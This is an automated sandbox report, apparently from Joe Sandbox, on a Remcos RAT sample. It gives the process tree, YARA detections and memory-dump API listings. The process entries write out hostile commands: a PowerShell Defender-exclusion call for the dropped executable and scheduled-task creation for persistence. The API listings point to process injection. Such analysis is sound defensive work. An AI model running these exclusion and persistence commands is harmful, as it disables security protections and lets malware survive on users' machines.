                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:03:04:09
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:03:04:09
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x960000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:03:04:10
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:6
                                                                                        Start time:03:04:10
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp53D2.tmp"
                                                                                        Imagebase:0xe10000
                                                                                        File size:187'904 bytes
                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:7
                                                                                        Start time:03:04:10
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:8
                                                                                        Start time:03:04:10
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\Desktop\PEbZthAqV9.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PEbZthAqV9.exe"
                                                                                        Imagebase:0x9f0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.4179854421.0000000001257000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:false

                                                                                        Target ID:9
                                                                                        Start time:03:04:12
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Imagebase:0x7a0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Antivirus matches:
                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                        • Detection: 63%, ReversingLabs
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:10
                                                                                        Start time:03:04:14
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                        Imagebase:0x7ff693ab0000
                                                                                        File size:496'640 bytes
                                                                                        MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:12
                                                                                        Start time:03:04:20
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\myTuDsvNcebev" /XML "C:\Users\user\AppData\Local\Temp\tmp7C97.tmp"
                                                                                        Imagebase:0xe10000
                                                                                        File size:187'904 bytes
                                                                                        MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:13
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff7699e0000
                                                                                        File size:862'208 bytes
                                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:14
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x1b0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:15
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x320000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:16
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x50000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:17
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0x3a0000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Has exited:true

                                                                                        Target ID:18
                                                                                        Start time:03:04:21
                                                                                        Start date:08/12/2024
                                                                                        Path:C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\AppData\Roaming\myTuDsvNcebev.exe"
                                                                                        Imagebase:0xc90000
                                                                                        File size:982'536 bytes
                                                                                        MD5 hash:10AB4B6FB83AEA3840AC04855974F62D
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1910984680.000000000124B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                        • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_EventViewer, Description: detects Windows exceutables potentially bypassing UAC using eventvwr.exe, Source: 00000012.00000002.1910424880.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                        Has exited:true


                                                                                          Execution Graph

                                                                                          Execution Coverage:10.7%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:174
                                                                                          Total number of Limit Nodes:15

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 4'fq$<ov!$TJkq$Tefq$pjq$xbiq
                                                                                          • API String ID: 0-4095964437
                                                                                          • Opcode ID: 80b41769fde6981e84b9847a060fdcfad1a076adad8d44ef20d958948000400f
                                                                                          • Instruction ID: 5b0d97363bc41f334e52d55d544e5f49989a76d72b33588362e3e92d3d773907
                                                                                          • Opcode Fuzzy Hash: 80b41769fde6981e84b9847a060fdcfad1a076adad8d44ef20d958948000400f
                                                                                          • Instruction Fuzzy Hash: 75B2C375E00228DFCB65CF69C984AD9BBB2BF89304F1581E9D509AB365DB319E81CF40

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: D
                                                                                          • API String ID: 0-2746444292
                                                                                          • Opcode ID: 67ec23b67089ec6fda5a71332d5f0ac6cc019fe15c015038d1c461dfbc276caf
                                                                                          • Instruction ID: 0c7181db204eccca50f970ed4922d7c199e17be5af31f2e3f4ad185db2629d1d
                                                                                          • Opcode Fuzzy Hash: 67ec23b67089ec6fda5a71332d5f0ac6cc019fe15c015038d1c461dfbc276caf
                                                                                          • Instruction Fuzzy Hash: 8152B974A002298FCB65DF68C998A9EB7B2FF89300F1045D9D549A7365CF31AE81CF51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1838316165.000000000AD60000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD60000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_ad60000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: fe58d1468fd6989adc4c321c0ec1adc80d46a29fb69e38ef4374cd6d19e32301
                                                                                          • Instruction ID: b78702a4aeeea4dc68901346b2aa55951f957ffca5d5d4e5f07113ae81223f37
                                                                                          • Opcode Fuzzy Hash: fe58d1468fd6989adc4c321c0ec1adc80d46a29fb69e38ef4374cd6d19e32301
                                                                                          • Instruction Fuzzy Hash: 5CE1DD70B012048FDB29DF75C450BAEB7FAAF8A300F16846DE146DB291CB35E941DB91
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: bce9662ee7bd3ce9b4cfd1dcf7570cb0aba3696f7cf7f9eb36c40fd1b9281e9b
                                                                                          • Instruction ID: f9cf93ccc295665e20f674468c7cb1ffa1916654ae355a5bc90bc691d07aa0c2
                                                                                          • Opcode Fuzzy Hash: bce9662ee7bd3ce9b4cfd1dcf7570cb0aba3696f7cf7f9eb36c40fd1b9281e9b
                                                                                          • Instruction Fuzzy Hash: 3A2127B1D156188BEB08CFA7D8453EEBFB6FFCA304F04C06AD40966255DB7009468BA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6b6a9f4e36ddb344ad082da20738e0cfa0ffe71f3cad264247dc642c5c46516a
                                                                                          • Instruction ID: 7a6eb91b4d6cedefe69e3770564bfc700ce6c05fc81ae88a00d942557960b989
                                                                                          • Opcode Fuzzy Hash: 6b6a9f4e36ddb344ad082da20738e0cfa0ffe71f3cad264247dc642c5c46516a
                                                                                          • Instruction Fuzzy Hash: 0321E4B0D156189BEB18CF97D8447EEFABAFFCA304F14C02A940966264DB7509498BA0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 6017f6232e2eb168882c51d9e3fd057b023d026d01f6af0d6d9251c92a1e5a1e
                                                                                          • Instruction ID: a26cd1d71cf8c2b9d2b1980f74f93c58f9d6574def36e3ce7258d487b0bd243f
                                                                                          • Opcode Fuzzy Hash: 6017f6232e2eb168882c51d9e3fd057b023d026d01f6af0d6d9251c92a1e5a1e
                                                                                          • Instruction Fuzzy Hash: BFE08CF4D1E288CFC7429B7464905F1BFF8BF0B204F0828E9C08967692D6648900CB26

                                                                                          Control-flow Graph

Strings
Memory Dump Source
• Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
Similarity
• API ID:
• String ID: 4'fq$4'fq$4'fq$4'fq$4'fq$4'fq$4'fq
• API String ID: 0-4057749079
• Opcode ID: 49a722af8ba9c44e557112ce5cffc744a80e9238c2a6dce4a13638faedc8959a
• Instruction ID: 1b1260db96b64d3fcceab7aedc4329e4ccc88044036d3a292beee411809fae35
• Opcode Fuzzy Hash: 49a722af8ba9c44e557112ce5cffc744a80e9238c2a6dce4a13638faedc8959a
• Instruction Fuzzy Hash: E0E1AF356002059FDB09EF75E990BAE7BB2EF89304F044069E506EB3A6DF359D41CB91

Control-flow Graph
Strings
Memory Dump Source
• Source File: 00000000.00000002.1830060014.0000000002D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_PEbZthAqV9.jbxd
Similarity
• API ID:
• String ID: (ofq$(ofq$(ofq$,jq$,jq$Hjq
• API String ID: 0-4260206024
• Opcode ID: 5b7282100881158f42f3339889f60348cb3170c9e46bab9bac88008f2f0c1f82
• Instruction ID: d5c2df85d6cb372e03367793fa721fd7724e15e94c0b8582d77158305b68db68
• Opcode Fuzzy Hash: 5b7282100881158f42f3339889f60348cb3170c9e46bab9bac88008f2f0c1f82
• Instruction Fuzzy Hash: C5219DB5A0460A8FDB11DFB8C4D4AAEBBB1EF49354F1540A5E905DB361DB30EC81CBA1

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 00C1D496
• GetCurrentThread.KERNEL32 ref: 00C1D4D3
• GetCurrentProcess.KERNEL32 ref: 00C1D510
• GetCurrentThreadId.KERNEL32 ref: 00C1D569
Memory Dump Source
• Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: 886fce025b8738d49974890e734828d1358d0b89d0092f6fa96d597f2d2fee76
• Instruction ID: 6482006462ff296a0d2ee9397c5211a4d20bf9123bd069272ae799c1bc66d379
• Opcode Fuzzy Hash: 886fce025b8738d49974890e734828d1358d0b89d0092f6fa96d597f2d2fee76
• Instruction Fuzzy Hash: F25159B0900309DFDB24CFAAD548BDEBBF1EF89318F248459E019A7360D7749984CB65

Control-flow Graph
APIs
• GetCurrentProcess.KERNEL32 ref: 00C1D496
• GetCurrentThread.KERNEL32 ref: 00C1D4D3
• GetCurrentProcess.KERNEL32 ref: 00C1D510
• GetCurrentThreadId.KERNEL32 ref: 00C1D569
Memory Dump Source
• Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
Similarity
• API ID: Current$ProcessThread
• String ID:
• API String ID: 2063062207-0
• Opcode ID: d236db0485576c06628560415fbdcbbd94b348f822b6da72196c0bb3b4af28ec
• Instruction ID: 667870085b88d1c5c4c11f7f4813bc3842e0aeee0273c4ec7b1ad6283fd71436
• Opcode Fuzzy Hash: d236db0485576c06628560415fbdcbbd94b348f822b6da72196c0bb3b4af28ec
• Instruction Fuzzy Hash: 065146B0900309DFDB24CFAAD548BDEBBF1EF89318F248459E419A7360D774A984CB65

Control-flow Graph
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0754BF26
Memory Dump Source
• Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 68525a0d4efb9f9d21fc23ac107c3d378999d9b93b49964909131ca5c98e4d6f
• Instruction ID: 2fd4bee75371c791a94640fe3c2b08893dad5d39d8efbe7290befde2949d8be8
• Opcode Fuzzy Hash: 68525a0d4efb9f9d21fc23ac107c3d378999d9b93b49964909131ca5c98e4d6f
• Instruction Fuzzy Hash: 52A13BB1D04219DFDF24DF68C8417DDBAB2FF48318F1485AAE808A7290DB759985CF91

Control-flow Graph
APIs
• CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0754BF26
Memory Dump Source
• Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: a6f678effa56d46382bd6c1790a5720afa6b32ff3c8cfc8b431143c6b5847b02
• Instruction ID: 82e0fa39234d334a252d4fcaf006c0b4c1b14023fe271f1e872f557b56a1a593
• Opcode Fuzzy Hash: a6f678effa56d46382bd6c1790a5720afa6b32ff3c8cfc8b431143c6b5847b02
• Instruction Fuzzy Hash: 60913BF1D0021ADFDF24DF69C8417DDBAB2BF48318F1485AAE808A7290DB759985CF91

Control-flow Graph
APIs
• GetModuleHandleW.KERNELBASE(00000000), ref: 00C1AFDE
Memory Dump Source
• Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
Similarity
• API ID: HandleModule
• String ID:
• API String ID: 4139908857-0
• Opcode ID: 9b8d381857ebcadcef750935490dfcce8ca2dce17fa8574ba191ff5c67d8021e
• Instruction ID: 80784b59d094171ba4d41891ac34e6bc814badb3421c31a5283e4843f98958c1
• Opcode Fuzzy Hash: 9b8d381857ebcadcef750935490dfcce8ca2dce17fa8574ba191ff5c67d8021e
• Instruction Fuzzy Hash: 6F7167B0A01B059FDB24DF29D44179ABBF1FF89300F10892DE49AD7A50DB34E985DB91

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 00C159C9
Memory Dump Source
• Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: 1df571a7bc4e778db033b1bbd5a2c3e03ab377ccad0ae320c59c51690bcb76dd
• Instruction ID: a8f6c9d6169297b68e32a796c5fc2dd3002b0d1163e6d756db9718061f44fe30
• Opcode Fuzzy Hash: 1df571a7bc4e778db033b1bbd5a2c3e03ab377ccad0ae320c59c51690bcb76dd
• Instruction Fuzzy Hash: 504100B1C0061DCEDB24CFA9C884BDEBBB5FF89304F20816AD408AB255DB756986CF50

Control-flow Graph
APIs
• CreateActCtxA.KERNEL32(?), ref: 00C159C9
Memory Dump Source
• Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
Similarity
• API ID: Create
• String ID:
• API String ID: 2289755597-0
• Opcode ID: d353d09806d8602df94c75683909cb29aa2dd6fdf34900b8994050138210bfd2
• Instruction ID: dc9aaf2b43482792cbedeb681487a1ff9cbddfc16caf0c66e7106f66a90c293e
• Opcode Fuzzy Hash: d353d09806d8602df94c75683909cb29aa2dd6fdf34900b8994050138210bfd2
• Instruction Fuzzy Hash: CC41E2B0C0061DCADB24CFA9C984BDEBBB5FF89304F20805AD408AB255DB756986DF90

Control-flow Graph
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0754BAF8
Memory Dump Source
• Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: c8e289de85f654623f11decf67a134417130c8ab8c4444cbc9f2629ffab92ccc
• Instruction ID: e58d90d726c4ebb63a9c18ecddbc73038db1fba6565923730f5916c915ec2f58
• Opcode Fuzzy Hash: c8e289de85f654623f11decf67a134417130c8ab8c4444cbc9f2629ffab92ccc
• Instruction Fuzzy Hash: DF215CB69003499FDB10CFAAC985BDEBBF5FF48324F14842AE519A7241D7749940DBA0
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0754BBD8
Memory Dump Source
• Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 3dd46eccdcdfb40e2fc2ad6f1e0ce47267c8bfa2badffb6316b6443a8af30e00
• Instruction ID: ac64670d8e0ac19f15fbda44c6f7f6b1876674508693a5f8af2392b4f7b86790
• Opcode Fuzzy Hash: 3dd46eccdcdfb40e2fc2ad6f1e0ce47267c8bfa2badffb6316b6443a8af30e00
• Instruction Fuzzy Hash: A22139B18003099FDB10DFAAC841ADEBBF5FF48324F10842AE518A7240C779A940DBA5
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0754BAF8
Memory Dump Source
• Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 04e69e5002582eaaa82fd2424cdfe10bb0dfdf116d737fa9b737fb611ec9f8ca
• Instruction ID: 8b5517fe730823fd6703ae0eb8be10f81a4d05b9fbf4c84cf89058c4b7b57d52
• Opcode Fuzzy Hash: 04e69e5002582eaaa82fd2424cdfe10bb0dfdf116d737fa9b737fb611ec9f8ca
• Instruction Fuzzy Hash: 0C213BB19003499FDB10CFAAC985BDEBBF5FF48314F14842AE519A7240D7789940DBA0
APIs
• Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0754B94E
Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          • Opcode ID: 672dacb1099b5f91237d6f4184930cd450de0b95f155e0b8aeacf4117fcaa78a
                                                                                          • Instruction ID: 7b09c5965b43f918215ef0e807ec177647c4787ff747a60da30d04e1af99cb3e
                                                                                          • Opcode Fuzzy Hash: 672dacb1099b5f91237d6f4184930cd450de0b95f155e0b8aeacf4117fcaa78a
                                                                                          • Instruction Fuzzy Hash: 472159B19003099FDB14DFAAC4817EEBBF4EF48324F10842AD459A7240CB78A945CBA1
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00C1D6E7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1828065397.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c10000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: b088eaa2ce5b885c37daf4b47b880d6ae3df56cdb3f29bc62ac671523a5ffa49
                                                                                          • Instruction ID: 5fd1e208d2854c3604f31fd73c853efe178435de01bd0e29b03c53f65309195d
                                                                                          • Opcode Fuzzy Hash: b088eaa2ce5b885c37daf4b47b880d6ae3df56cdb3f29bc62ac671523a5ffa49
                                                                                          • Instruction Fuzzy Hash: 532148B5800249DFDB10CFAAD584ADEBFF4EF49320F24855AE969A7350C374A941DF60
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0754BBD8
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1835554137.0000000007540000.00000040.00000800.00020000.00000000.sdmp, Offset: 07540000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7540000_PEbZthAqV9.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0
                                                                                          • Opcode ID: f34ea4a93faf0069510bb1f4a454afe0b87b17230466c2f80d2574c30e8fcd11
